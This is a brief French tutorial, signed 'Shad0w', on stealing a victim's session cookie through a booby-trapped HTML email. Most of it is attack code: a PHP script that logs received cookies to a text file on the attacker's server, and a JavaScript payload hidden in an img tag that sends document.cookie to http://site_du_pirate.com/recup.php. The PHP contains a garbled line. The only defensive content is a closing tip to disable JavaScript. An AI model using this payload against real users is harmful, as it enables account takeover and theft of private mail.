Nous allons voir ici comment il est possible de récupérer le cookie d'une cible en lui envoyant simplement un mail contenant un code hostile.

Nous allons ici étudier le code et la méthode employée.

Pour que le code soit exécuté, il faudra exploiter une faille du webmail visé, mais nous ne verrons pas cela ici.

La technique est simple, le pirate va d'abord créer un script php qui servira a enregistrer le cookie dans un fichier txt sur le ftp, il sera donc placé sur un serveur quelconque.

Code du script recup.php :

<?
$fp=f"cookie.txt", "a");
fwrite($fp, "$cookie\n");
fclose($fp);
?>

Voici ce script commenté :

1) Ouverture du fichier cookie.txt, il est crée s'il n'existe pas sur le serveur

2) Ecriture du contenu de la variable $cookie dans le fichier, la variable $cookie contiendra le cookie envoyé par le code javascript.

3) Fermeture du fichier sur le serveur.

Une fois ce script présent sur le serveur du pirate (donc accessible maintenant à l'adresse http://site_du_pirate.com/recup.php).

Le pirate va maintenant se servir d'un code javascript très simple qui va écrire le contenu du cookie dans la variable cookie du script php.

Pour insérer le Javascript, le pirate va se servir de la balise "<img src" , ceci afin que le code hostile passe pour un imageinoffensive et invisible.

Code Javascript :

<img src="javascript:var ima=new Image(); ima.src=' http://site_du_pirate.com/recup.php?cookie='+document.cookie">

Le pirate placera le code Javascript dans la source html de son email afin que ce code soit s'exécute à l'ouverture du mail par la victime.

Je viens de vous démontrer ici comme il est simple de se faire voler un cookie simplement en lisant un email !

Pour parer cette attaque, il suffit de désactiver l'exécution du Javascript dans les options de son navigateur web.

Shad0w